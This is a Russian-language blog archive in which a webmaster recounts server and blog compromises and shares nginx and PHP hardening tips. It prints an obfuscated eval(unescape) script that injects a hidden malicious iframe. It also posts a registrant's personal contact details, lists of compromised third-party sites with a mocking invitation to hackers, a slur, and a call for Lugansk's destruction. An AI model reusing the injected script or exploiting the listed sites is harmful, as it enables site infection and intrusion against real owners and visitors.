Показаны сообщения с ярлыком хакеры. Показать все сообщения
Показаны сообщения с ярлыком хакеры. Показать все сообщения

7 янв. 2015 г.

Защита nginx на сервере

Защита nginx на сервере многогранна.

Одна из граней, пока у нас не увели рута или юзера с правами рута, то логи nginx нужно обогатить:

if ($request_method ~ "^POST$") {
    access_log /var/log/nginx/access-POST-$server_name.log main_post;
}
if ($request_method ~ "^(PUT|OPTIONS|HEAD|PATCH|DELETE|TRACE|CONNECT)$") {
    access_log /var/log/nginx/access-PUT-$server_name.log main_post;
}

ну и:

log_format main_post '$remote_addr [$time_local] $host "$request" '
    '$status $body_bytes_sent [$request_body] "$http_referer" '
    '"$http_user_agent"';

ну и client_body_buffer_size в /etc/nginx/nginx.conf установить как вам нужно, чтобы ваши запросы помещались, а хакерские нет :)
или наоборот, ставьте побольше, чтобы любой хакерский запрос поймать.

и защитить:

chown nginx:nginx /var/log/nginx
chmod 200 /var/log/nginx

последнее особенно удивительно для меня, самоучки, но логи пишутся, а больше убирать там нечего :)

UPDATE уже ночью
логи то пишутся, но после рестарта nginx хочет прочитать старое, чтобы добавить новое и не может.
поэтому

chmod 600 /var/log/nginx

и наблюдаем дальше...

И да, Ceterum censeo Lugansk esse delendam! Прочитать полностью...

5 янв. 2015 г.

Защита PHP на сервере

По следам наших выступлений раз, два.

Я считаю обязательным  в файле /etc/php.ini установить disable_functions = длинный список функций под катом


Прочитать полностью...

Второй хакер на новом сервере results@hackermail.com

Второй хакер на новом сервере results@hackermail.com
Аваст называет его PHP:BackDoor-DJ [Trj]
Смог только залить псевдогифку в /tmp/ но уже не gzip, а просто PHP в виде гифки.
первый заливал сжатый PHP:Shell-HP [Trj]
И да, Ceterum censeo Lugansk esse delendam! Прочитать полностью...

3 янв. 2015 г.

Первые хакеры на новом сервере

Поздравь хакера с Новым 2015 годом по одному из адресов:

citiexplosion2013@gmail.com
sarna_p@yahoo.com
bebeshark@live.com

На новом сервере, я ещё не успел им похвастаться, залили псевдогифку в /tmp/

Вот под катом её PHP текст уже после расшифровки, текстовки на индонезийском языке

Апдейт 05/01/2014

Аваст спустя 10 дней от начала этого безобразия обновился :) и стал называть это "PHP:Shell-HP [Trj]" и блокировать, поэтому текст я убрал. Если кому-то нужно - вставлю картинкой.

Прочитать полностью...

27 авг. 2010 г.

Снова хакеры. На этот раз взрослые.

15 часов назад у меня сломали сервер, залили шел и начали что-то там в инете сканировать. Загрузили процессор на 100% без передышки - чем и привлекли моё внимание и админов хостера.

Проверяйте свои логи на предмет вот такого:

111.222.333.444 - - [27/Aug/2010:12:12:12 +0300] "GET /myadmin/scripts/setup.php HTTP/1.0" 200 14058 "http://111.222.333.444/myadmin/scripts/setup.php" "Opera"

и удаляйте или обновляйте setup.php от ПХПмайАдмина.

Я про это читал месяц назад, но "авось" не пронесло :)

Спасибо за внимание. Прочитать полностью...

25 мар. 2010 г.

Хакеры 2

Несколько дней назад хакеры взломали один из моих медицинских блогов (WP 2.7.1 сам виноват, не обновлялся) и залили в хэдер ява-скрипт. Антивирус Аваст на него ругается - всё нормально. Текст скрипта с эксплойтом залить на блогспот очень проблематично, поэтому исходник можно посмотреть тут:

http://livepad.ru/view/6454c638

После расшифровки там нашлось http://itsallbreaksoft.net/tds/in.cgi?.......

Смотрим

itsallbreaksoft.net

Creation date: 26 Jan 2010
Registrant Contact:
Nexton Limited
Ryabov Sergey ()
+79219270961
Fax: +79219270961
Scherbakova st., 6-38
Saint-Petersburg, 197375
RU

http://www.sigurdblog.com/ruler-domains/
"...Мы не продаем домены под кодеки, софт и прочую малвару..."

Почему гугл забанил все домены этого регистратора http://www.gofuckbiz.com/showthread.php?t=14179 (27.01.2010, 12:50)? Почему гугл так медленно пускает их обратно в индекс?

Загадка :(

Ну и на последок нужно отписаться от кого-то. Сегодня это

http://brutalblog.ru/ Блог хороший, интересный, но мне там читать нечего.
Прочитать полностью...

6 февр. 2010 г.

Взломщики

Хакеры взломали один мой блог и напичкали линками. Я завел специальный блог для публикации подробностей про этих педиков оптимизаторов нетрадиционной ориентации.
Стремный текст теперь будет там.



Прочитать полностью...

16 авг. 2008 г.

Сайт Московского Полубомжа содержит вредоносное ПО

Захожу на его сайт и вижу такое:



Вот вопрос - это плагин WP-ban так работает ИЛИ хакеры подложили ИЛИ МПБ так со спамерами борется?

Под катом содержится дезактивированный и расшифрованный текст самого айфрейма и его исходник:


(iframe src="http://orentraff.cn/in.cgi?13" style="visibility: hidden; display: none")(/iframe)

Кто сомневается, вот исходник страницы:

Requesting http://www.mpbseo.ru/ .. Ok
Reply received (reply time: 765 ms)
-----------------------------------
HTTP/1.1 200 OK
Date: Sat, 16 Aug 2008 20:22:13 GMT
Content-Type: text/html
Connection: close
Server: Apache
Content-Length: 2714

...тут текст страницы...

(/html)(script type="text/javascript")
eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%5C%75%30%30%33%63%5C%75%30%30%36%39%5C%75%30%30%36%36%5C%75%30%30%37%32%5C%75%30%30%36%31%5C%75%30%30%36%64%5C%75%30%30%36%35%5C%75%30%30%32%30%5C%75%30%30%37%33%5C%75%30%30%37%32%5C%75%30%30%36%33%5C%75%30%30%33%64%5C%75%30%30%32%32%5C%75%30%30%36%38%5C%75%30%30%37%34%5C%75%30%30%37%34%5C%75%30%30%37%30%5C%75%30%30%33%61%5C%75%30%30%32%66%5C%75%30%30%32%66%5C%75%30%30%36%66%5C%75%30%30%37%32%5C%75%30%30%36%35%5C%75%30%30%36%65%5C%75%30%30%37%34%5C%75%30%30%37%32%5C%75%30%30%36%31%5C%75%30%30%36%36%5C%75%30%30%36%36%5C%75%30%30%32%65%5C%75%30%30%36%33%5C%75%30%30%36%65%5C%75%30%30%32%66%5C%75%30%30%36%39%5C%75%30%30%36%65%5C%75%30%30%32%65%5C%75%30%30%36%33%5C%75%30%30%36%37%5C%75%30%30%36%39%5C%75%30%30%33%66%5C%75%30%30%33%31%5C%75%30%30%33%33%5C%75%30%30%32%32%5C%75%30%30%32%32%5C%75%30%30%32%30%5C%75%30%30%37%33%5C%75%30%30%37%34%5C%75%30%30%37%39%5C%75%30%30%36%63%5C%75%30%30%36%35%5C%75%30%30%33%64%5C%75%30%30%32%32%5C%75%30%30%37%36%5C%75%30%30%36%39%5C%75%30%30%37%33%5C%75%30%30%36%39%5C%75%30%30%36%32%5C%75%30%30%36%39%5C%75%30%30%36%63%5C%75%30%30%36%39%5C%75%30%30%37%34%5C%75%30%30%37%39%5C%75%30%30%33%61%5C%75%30%30%32%30%5C%75%30%30%36%38%5C%75%30%30%36%39%5C%75%30%30%36%34%5C%75%30%30%36%34%5C%75%30%30%36%35%5C%75%30%30%36%65%5C%75%30%30%33%62%5C%75%30%30%32%30%5C%75%30%30%36%34%5C%75%30%30%36%39%5C%75%30%30%37%33%5C%75%30%30%37%30%5C%75%30%30%36%63%5C%75%30%30%36%31%5C%75%30%30%37%39%5C%75%30%30%33%61%5C%75%30%30%32%30%5C%75%30%30%36%65%5C%75%30%30%36%66%5C%75%30%30%36%65%5C%75%30%30%36%35%5C%75%30%30%32%32%5C%75%30%30%33%65%5C%75%30%30%33%63%5C%75%30%30%32%66%5C%75%30%30%36%39%5C%75%30%30%36%36%5C%75%30%30%37%32%5C%75%30%30%36%31%5C%75%30%30%36%64%5C%75%30%30%36%35%5C%75%30%30%33%65%27%29%3B"));
(/script)


Прочитать полностью...

2 июл. 2008 г.

Выкладываю список криворуких админов за июнь 2008.

С этих хостов в июне пытались ломать мои джобаксовые-маркетхэлсовые (с реф) аптеки. Предыдущий список за май.

Хакеры могут идти доламывать, если там есть что ещё сломать.

Если вы уверены, что ваш сайт не дырявый - пишите в комментах, уберу из списка.
Итак, продожаем список жертв < ?php echo md5("just_a_test");? > (пробелы до и после угловых скобок убрать):

http://www.jyvaskylankirjastot.fi/yhteistyo/wd/muji/renula/xejad
http://www.qualitas1988.com/images/editor/.thumbs/sowem/mudi/
http://www.polarflug.de/sources/sinokof/copaxan/
http://www.oriolmanya.net/nautilus/phpBB2/language/lang_english/
http://www.blankner.ocps.net/media/yeloc/repaw/
http://www.totkom.com/sklep/admin/includes/classes/cohiru/neyuza
http://www.elettrodataservice.it/foto_articoli/pivafof/mibi/
http://www.interkonet.com/galeria/modules/albumselect/ucu/yixipu
http://www.landi-sempach-emmen.ch/aktionen/image/zafecez/roxovef
Прочитать полностью...

24 мая 2008 г.

Криворукие админы. Бегом сюда, тут про вас написано.

Кто не заховался - я не виноват.
Выкладываю список дырявых сайтов, с которых бомбят мои аптеки.
Если вы уверены, что ваш сайт не дырявый - пишите в комментах, уберу из списка.
Итак, список славы имени < ?php echo md5("just_a_test");? > (пробелы до и после угловых скобок убрать):


23/05/2008 пятница

http://www.psikolojikyardim.org/etkinlik/include/eto/nixaz/
http://www.obrasmecanicasch.com/omch/img/anawuho/ledego/
http://www.marsbook.co.kr/main/created/product/2/mumas/ohalupa/
http://www.pattibus.it/phplib-7.2b/pages/ilosi/dohigal/
http://www.tureksfuar.com.tr/joomla/mambots/content/ugi/vipo/
http://sans-packing.ru/img/jipeqap/ehudute/
http://www.felixtorresycia.com/admin/correo/enaq/ecib/
http://www.municipioxii.it/sunnyway/igodoq/bukosud/
http://sahel55.com/articles/omaduro/kimumid/
http://www.municipioxii.it/sunnyway/eheqebi/jahibop/
http://sites.redskycreative.com/canyonlakechurch/jolalu/buq/
http://www.service-exposants.com/store/iyi/jab/
http://www.zlotow.biz/radiomariana2/rawi/ayutuqi/
http://www.obrasmecanicasch.com/omch/img/itofu/viroja/
http://mojazubarka.sk/test/admin/sicaqe/socoqar/
http://www.unduetretoccaate.it/codice/aseje/wocobo/
http://www.altaiseer-eg.com/ar/articles/jed/umut/
http://www.electrofed.com/_app/efc/odoqu/ferus/
http://sinzinuri.com/imsi/db/pic/huv/abey/
http://honamfishing.co.kr/phpmysqladmin/libraries/oduzov/neloze/
http://www.asigurareamea.ro/upload_fisiere/ibanar/suxokud/
http://lnx.sarapica.net/art/kepex/ipoj/
http://www.fabcraft.co.uk/forum/lovuqo/zil/
http://honamfishing.co.kr/phpmysqladmin/libraries/nov/wulosu/
http://www.ce-cioceoforum.com/talk/t1/roda/ilubov/
http://www.asais.info/newsletter/includes/lohu/vomi/
http://www.cjp.spb.ru/en/tis/leboma/
http://www.spoddyland.co.uk/scans/youneedtoselectaplanettoclaimb
http://www.thoseguysfilms.com/forums/templates/subSilver/images/
http://www.polisgrandhotel.gr/_cm_admin/maillist/editor/plugins/
http://lnx.sarapica.net/art/ufo/uco/
http://www.interkonet.com/enxicmarxant/web/editor/scripts/icons/
http://www.slda.info/images/edunuha/ade/
http://www.thoseguysfilms.com/forums/templates/subSilver/images/
http://www.meexia.com/blog/wp-content/themes/squares/orelura/wag
http://www.marsbook.co.kr/main/created/product/2/upu/ohoqoh/
http://www.soeasywebsite.com/soeasycasino/enosucu/ijani/
http://sinzinuri.com/imsi/db/pic/bezefi/ugoye/
http://www.vlopezalvarez.com/Personal/Fotos/Viajes/xaj/yit/
http://www.syntasoft.com/forum/Themes/rowizah/nisahuc/
http://www.northfans.ch/forum/admin/settings/gucor/ujusu/
http://www.northfans.ch/forum/admin/settings/ocoyo/azad/
http://www.heaven-house.kz/templates_c/sexes/afacub/
http://cyberoute.com/demo/docs/images/gurod/ahah/
http://www.felixtorresycia.com/admin/correo/enaq/zonod/
http://www.elettrodataservice.it/foto_articoli/pivafof/oqonon/
http://www.foicr.org/work/mulito/vom/
http://www.tureksfuar.com.tr/joomla/mambots/content/cobojax/udak
http://www.centralbalkannationalpark.org/de/jage/cevoyi/
http://www.eloge-du-bien-commun.be/blog/bundled-libs/Net/ocoqen/
http://www.stomol.ru/catalog/afa/azo/
http://www.thoseguysfilms.com/forums/templates/subSilver/images/
http://www.nedkellypub.it/concerti/dati/hoca/etoyen/
http://www.cjp.spb.ru/en/aki/ucuyupi/
http://www.vacacionalhouse.com/en/img/vohe/seyon/
http://www.soeasywebsite.com/soeasycasino/ixu/xotem/
http://www.planet-pictures.de/content_system/sehenab/jajox/
http://www.thoseguysfilms.com/forums/templates/subSilver/images/
http://www.channelnewsperu.com/imagenes/publicaciones/fotos/nepi
http://www.elettrodataservice.it/foto_articoli/onoda/iyegimi/
http://www.winbd.net/admin/jist_code/wowoz/opaxi/
http://www.spoddyland.co.uk/scans/youneedtoselectaplanettoclaimb
http://www.asigurareamea.ro/upload_fisiere/agihixu/bezodan/
http://www.germania-neureut.de/files/statistik/oto/ajisiwe/
http://www.feliciano.de/Webgalerie/bilder/Italy/une/yiwul/
http://www.lamarguerite.ca/Pat/images/awixeta/veb/
http://www.oriolmanya.net/nautilus/phpBB2/language/lang_english/
http://www.thoseguysfilms.com/forums/templates/subSilver/images/
http://www.thoseguysfilms.com/forums/templates/subSilver/images/
http://www.filter-international.com/webservice/aro/medavuw/

Прочитать полностью...